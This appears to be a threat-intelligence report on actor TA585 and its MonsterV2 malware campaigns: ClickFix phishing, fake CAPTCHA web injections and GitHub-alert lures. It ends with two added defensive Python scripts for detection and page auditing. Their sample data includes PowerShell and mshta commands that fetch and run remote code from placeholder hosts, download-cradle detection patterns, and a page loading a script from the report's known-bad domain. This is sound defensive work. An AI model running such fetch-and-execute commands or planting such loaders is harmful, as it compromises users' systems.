Full Report
Cybersecurity researchers have shed light on a previously undocumented threat actor called TA585 that has been observed delivering an off-the-shelf malware called MonsterV2 via phishing campaigns. The Proofpoint Threat Research Team described the threat activity cluster as sophisticated, leveraging web injections and filtering checks as part of its attack chains. "TA585 is notable because it
Analysis Summary
# Threat Actor: TA585
## Attribution & Identity
Threat actor cluster identified as **TA585**. Researchers describe them as sophisticated and notable for owning their entire attack chain, managing their own infrastructure, delivery, and malware installation internally rather than outsourcing segments. The actor behind MonsterV2 is Russian-speaking.
## Activity Summary
TA585 is actively engaged in phishing campaigns distributing the **MonsterV2** malware.
Observed campaigns include:
1. **IRS-Themed Phishing:** Using U.S. Internal Revenue Service (IRS) lures to trick users into clicking fake URLs leading to a PDF, which then directs users to a web page employing the **ClickFix** social engineering tactic. This ultimately executes a malicious command via the Windows Run dialog or PowerShell to deploy MonsterV2.
2. **Web Injection Campaigns (April 2025):** Injecting malicious JavaScript into legitimate websites so that they serve fake CAPTCHA verification overlays; the overlay initiates infection via ClickFix, and MonsterV2 is delivered via PowerShell.
3. **GitHub Alert Lures:** Sending email notifications that mimic GitHub alerts, triggered by tagging users in bogus security notices, with URLs pointing to actor-controlled websites.
Initial campaign iterations distributed **Lumma Stealer** before switching to MonsterV2 in early 2025. The web injection infrastructure has also been linked to distribution of **Rhadamanthys Stealer**.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing via custom lures (e.g., IRS themes, fake GitHub alerts).
- **Execution Chain:** Leveraging **ClickFix** social engineering to trigger infection via malicious commands in Windows Run dialog or PowerShell.
- **Delivery:** Deploying PowerShell scripts to drop the main payload (MonsterV2).
- **Web Injection:** Injecting malicious JavaScript onto legitimate websites to display fake CAPTCHA overlays.
- **Malware Obfuscation:** MonsterV2 is typically packed using the **SonicCrypt** C++ crypter, featuring anti-analysis checks before payload decryption.
- **Evasion:** Performs anti-analysis checks (debugger/sandbox detection) upon launch.
- **Privilege Escalation:** The malware performs privilege elevation after launch.
- **C2 Communication:** Connects to Command-and-Control (C2) servers after decoding an embedded configuration.
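The execution chain above (a user pasting a lure's command into the Run dialog, which launches PowerShell or another interpreter under explorer.exe) leaves a recognisable parent/child pattern in process-creation telemetry. The following detection logic is an added example, not Proofpoint's or the report's own code: it scores constructed, simplified process-creation events (field names are assumptions standing in for EDR or Sysmon Event ID 1 data) by combining an interactive parent process with command-line traits such as hidden windows, execution-policy bypass and download cradles. The hosts in the sample events are placeholders.

```python
"""Flag ClickFix-style execution chains in process-creation telemetry.

Added example, not the report's or Proofpoint's code. Event fields
(id, parent_image, image, command_line) are an assumed, simplified
stand-in for EDR / Sysmon process-creation records.
"""
import re

# Interpreters that ClickFix lures typically drive from the Run dialog.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Processes that host the Run dialog / an interactive user session.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits worth flagging in combination (constructed patterns).
PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "download_cradle": re.compile(
        r"(?:iwr|invoke-webrequest|downloadstring|curl|certutil).*https?://", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "mshta_remote": re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
}


def _image(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if _image(event["image"]) not in SHELLS:
        return 0, reasons
    if _image(event["parent_image"]) in INTERACTIVE_PARENTS:
        reasons.append("shell spawned from interactive parent (Run dialog path)")
    for name, rx in PATTERNS.items():
        if rx.search(event["command_line"]):
            reasons.append(name)
    # An interactive parent alone is normal admin activity; the combination
    # with one or more lure-style command-line traits is what stands out.
    return len(reasons), reasons


def detect(events, threshold=2):
    """Return [(event id, reasons)] for events at or above the threshold."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["id"], reasons))
    return hits


# Constructed sample telemetry; example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/p.txt)"'},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",        # admin at a prompt
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell Get-ChildItem C:\Users"},
    {"id": 3, "parent_image": r"C:\Program Files\Git\cmd\git.exe",  # tooling noise
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c git status"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/x.hta"},
]

if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS):
        print(event_id, reasons)
```

Only events 1 and 4 cross the threshold; the plain administrative PowerShell launch and the git-spawned cmd.exe do not. The threshold and pattern set are tuning knobs: raising the threshold trades missed variants for fewer alerts on legitimate scripted administration.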
## Targeting
- Sectors: Not explicitly limited in the description, but IRS lures suggest government/financial linkage, and the nature of the malware (stealer, HVNC) suggests broad enterprise targeting.
- Geography: Avoids infecting **Commonwealth of Independent States (CIS) countries**.
- Victims: No specific victim organizations named outside of the general targeting theme implied by the lures.
## Tools & Infrastructure
- **Malware Families Used:**
  - **Primary:** MonsterV2 (RAT, stealer, loader; also known as Aurotun Stealer).
  - **Previously Used:** Lumma Stealer.
  - **Associated/Related:** Rhadamanthys Stealer (linked via shared infrastructure).
- **Infrastructure & Delivery Systems:**
  - The actor owns and manages its delivery, infrastructure, and malware.
  - Infrastructure associated with the web injects includes `intlspring[.]com` (defanged).
- **Commercial Assets:** MonsterV2 is sold commercially, with "Standard" ($800/month) and "Enterprise" ($2000/month) editions available.
## Implications
TA585 represents a determined and technically capable threat actor who maintains a high degree of control over their operations, reducing reliance on external criminal enterprises. Their use of established and novel delivery techniques (ClickFix combined with web injections) and sale of a feature-rich RAT/stealer (MonsterV2) makes them a significant threat capable of data exfiltration, financial fraud (clipboard clipping), and persistent remote access (HVNC).
## Mitigations
- **Endpoint Security:** Ensure robust endpoint detection and response capable of identifying packed/crypter-protected executables and suspicious PowerShell execution chains.
- **Email Filtering:** Harden email gateways against IRS-themed phishing attempts and against links pointing to suspicious URIs.
- **Web Application Security:** Monitor websites for signs of malicious third-party script injection, particularly those related to fake CAPTCHA overlays.
- **User Training:** Specific training against social engineering tactics like ClickFix, where users are tricked into executing commands via the Run dialog or PowerShell prompt.
- **Geo-blocking:** Because the malware deliberately avoids infecting CIS countries, geographic exclusion offers no protection to organizations outside the CIS, which should consider themselves primary targets for this deployment vector.
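The web application security item above asks site owners to watch for injected third-party scripts. One concrete way to do that is to inventory every `<script>` on a served page, compare external sources against an allowlist and the report's known-bad domain, and flag inline scripts carrying overlay-style indicators. The script below is an added example, not the report's or Proofpoint's tooling: the HTML is a constructed sample of a page carrying an injected loader, the `.test` and `.invalid` hosts are placeholders, and `intlspring[.]com` is refanged from the report's defanged indicator purely for string comparison.

```python
"""Inventory <script> tags on a page and flag unexpected or known-bad sources.

Added example, not the report's or Proofpoint's code. Allowlist, indicator
strings and the sample HTML are constructed; only intlspring[.]com comes
from the report (refanged here so it can be compared against parsed hosts).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def refang(domain):
    """Turn a defanged indicator such as 'a[.]b' back into 'a.b'."""
    return domain.replace("[.]", ".")


KNOWN_BAD_HOSTS = {refang("intlspring[.]com")}          # from the report
# Text fragments typical of fake-CAPTCHA overlay code (constructed heuristics).
INLINE_INDICATORS = ("captcha", "verify you are human", "document.write", "atob(")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute values
        self.inline = []        # inline script bodies
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self.inline.append("")

    def handle_data(self, data):
        # HTMLParser delivers script content as raw data, possibly in chunks.
        if self._in_script:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False


def audit(html, allowed_hosts, site_host):
    """Return findings as (kind, detail, snippet) tuples.

    kind is 'known_bad', 'unlisted' or 'inline'. Relative script paths are
    attributed to site_host and therefore treated as first-party.
    """
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname or site_host
        if host in KNOWN_BAD_HOSTS:
            findings.append(("known_bad", host, src))
        elif host not in allowed_hosts:
            findings.append(("unlisted", host, src))
    for body in parser.inline:
        lowered = body.lower()
        hits = [k for k in INLINE_INDICATORS if k in lowered]
        if hits:
            findings.append(("inline", ",".join(hits), body.strip()[:60]))
    return findings


# Constructed sample page; all hosts are placeholders except the refanged indicator.
SITE_HOST = "www.example-site.test"
ALLOWED_HOSTS = {SITE_HOST, "cdn.example-cdn.test"}
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-cdn.test/lib.js"></script>
<script src="https://intlspring.com/loader.js"></script>
<script src="https://stats.unknown-host.test/t.js"></script>
</head><body>
<script>
  // constructed stand-in for an injected fake CAPTCHA overlay
  var o = document.createElement("div");
  o.innerHTML = atob("VmVyaWZ5IHlvdSBhcmUgaHVtYW4=");
  document.body.appendChild(o);
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_HTML, ALLOWED_HOSTS, SITE_HOST):
        print(finding)
```

Run against a page fetched from your own site, the audit produces three findings for the sample: the known-bad loader, the unlisted analytics host, and the inline block that decodes and injects an overlay. A baseline of the allowlist taken from a known-clean deployment, re-checked on a schedule, turns this into a simple change-detection control for the injection technique the report describes.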